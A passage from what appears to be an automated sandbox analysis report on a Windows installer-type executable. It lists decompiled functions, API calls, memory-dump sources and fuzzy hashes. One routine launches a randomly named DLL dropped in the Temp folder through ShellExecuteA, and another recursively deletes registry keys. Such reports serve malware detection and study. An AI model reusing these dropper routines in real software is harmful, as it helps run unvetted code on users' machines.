				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                    0x00404635
                                                                    0x00404642
                                                                    0x00404648
                                                                    0x00404686
                                                                    0x00404686
                                                                    0x00404695
                                                                    0x0040469c
                                                                    0x00000000
                                                                    0x0040469e
                                                                    0x0040464a
                                                                    0x00404659
                                                                    0x00404661
                                                                    0x00404664
                                                                    0x00404676
                                                                    0x0040467c
                                                                    0x00404683
                                                                    0x00000000
                                                                    0x00404683
                                                                    0x00000000

                                                                    APIs
                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                    • GetMessagePos.USER32 ref: 0040464A
                                                                    • ScreenToClient.USER32 ref: 00404664
                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                    • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                    • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                    • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x30000
					_t7 =  *0x79d938;
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                                    0x00402bb7
                                                                    0x00402bbf
                                                                    0x00402bcb
                                                                    0x00402bd4
                                                                    0x00402bd7
                                                                    0x00402bd7
                                                                    0x00402bdf
                                                                    0x00402be1
                                                                    0x00402be7
                                                                    0x00402bee
                                                                    0x00402bf0
                                                                    0x00402bf0
                                                                    0x00402c09
                                                                    0x00402c14
                                                                    0x00402c21
                                                                    0x00402c29
                                                                    0x00402c29
                                                                    0x00402c34

                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                    • MulDiv.KERNEL32(00030000,00000064,?), ref: 00402BF6
                                                                    • wsprintfA.USER32 ref: 00402C09
                                                                    • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                    • SetDlgItemTextA.USER32 ref: 00402C21
                                                                    • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: TextWindow$ItemShowTimerwsprintf
                                                                    • String ID:
                                                                    • API String ID: 559026099-0
                                                                    • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                    • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                    • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                    • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                                    0x00401e3c
                                                                    0x00401e45
                                                                    0x00401e47
                                                                    0x00401e4c
                                                                    0x00401e4d
                                                                    0x00401e58
                                                                    0x00401e5a
                                                                    0x00401e65
                                                                    0x00401e71
                                                                    0x00401e7f
                                                                    0x00401e91
                                                                    0x004026da
                                                                    0x004026da
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 00401E5A
                                                                    • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                    Strings
                                                                    • %s %s, xrefs: 00401E4E
                                                                    • C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll, xrefs: 00401E53
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExecuteShellwsprintf
                                                                    • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                    • API String ID: 2956387742-3653653199
                                                                    • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                    • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                    • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                    • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                                    0x00402af5
                                                                    0x00402afd
                                                                    0x00402b25
                                                                    0x00402b0f
                                                                    0x00402b56
                                                                    0x00000000
                                                                    0x00402b5e
                                                                    0x00402b23
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402b23
                                                                    0x00402b3a
                                                                    0x00000000
                                                                    0x00402b46
                                                                    0x00402b50

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                    • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                    • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                    • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                    0x00401d3e
                                                                    0x00401d45
                                                                    0x00401d74
                                                                    0x00401d7c
                                                                    0x00401d83
                                                                    0x00401d83
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00401D38
                                                                    • GetClientRect.USER32 ref: 00401D45
                                                                    • LoadImageA.USER32 ref: 00401D66
                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                    • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                    • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                    • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                    • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 35%
                                                                    			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













                                                                    0x0040454d
                                                                    0x00404551
                                                                    0x00404559
                                                                    0x0040455c
                                                                    0x0040455d
                                                                    0x0040455f
                                                                    0x00404561
                                                                    0x00404564
                                                                    0x00404564
                                                                    0x0040456b
                                                                    0x00404571
                                                                    0x00404571
                                                                    0x00404578
                                                                    0x00404583
                                                                    0x00404584
                                                                    0x00404587
                                                                    0x00404587
                                                                    0x00404594
                                                                    0x0040459f
                                                                    0x004045a2
                                                                    0x004045b4
                                                                    0x004045bb
                                                                    0x004045bc
                                                                    0x004045cb
                                                                    0x004045db
                                                                    0x004045f7

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                    • wsprintfA.USER32 ref: 004045DB
                                                                    • SetDlgItemTextA.USER32 ref: 004045EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                    • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                    • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                    • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 54%
                                                                    			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                                    0x00401c19
                                                                    0x00401c22
                                                                    0x00401c2e
                                                                    0x00401c31
                                                                    0x00401c3b
                                                                    0x00401c3b
                                                                    0x00401c3e
                                                                    0x00401c42
                                                                    0x00401c4c
                                                                    0x00401c4c
                                                                    0x00401c4f
                                                                    0x00401c53
                                                                    0x00401c55
                                                                    0x00401ca2
                                                                    0x00401ca4
                                                                    0x00401cad
                                                                    0x00401cb5
                                                                    0x00401cb8
                                                                    0x00401cb8
                                                                    0x00401cc1
                                                                    0x00000000
                                                                    0x00401c57
                                                                    0x00401c5e
                                                                    0x00401c60
                                                                    0x00401c68
                                                                    0x00401c6b
                                                                    0x00401c93
                                                                    0x00401cc7
                                                                    0x00401cc7
                                                                    0x00401c6d
                                                                    0x00401c7b
                                                                    0x00401c83
                                                                    0x00401c86
                                                                    0x00401c86
                                                                    0x00401c6b
                                                                    0x00401cca
                                                                    0x00401ccd
                                                                    0x00401cd3
                                                                    0x004028d7
                                                                    0x004028d7
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                    • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                                                    • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                                                    • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 83%
                                                                    			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                    0x00401ea2
                                                                    0x00401ea7
                                                                    0x00401eb2
                                                                    0x00401eb9
                                                                    0x00401ebc
                                                                    0x004026da
                                                                    0x00401ec2
                                                                    0x00401ec5
                                                                    0x00401ed6
                                                                    0x00401ed1
                                                                    0x00401ed1
                                                                    0x00401eeb
                                                                    0x00401ef4
                                                                    0x00401f04
                                                                    0x00401f06
                                                                    0x00401f06
                                                                    0x00401ef6
                                                                    0x00401efa
                                                                    0x00401efa
                                                                    0x00401ef4
                                                                    0x00401f0d
                                                                    0x00401f10
                                                                    0x00401f10
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                      • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                      • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                      • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                      • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                      • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                                    • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                                    • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                                    Memory Dump Source
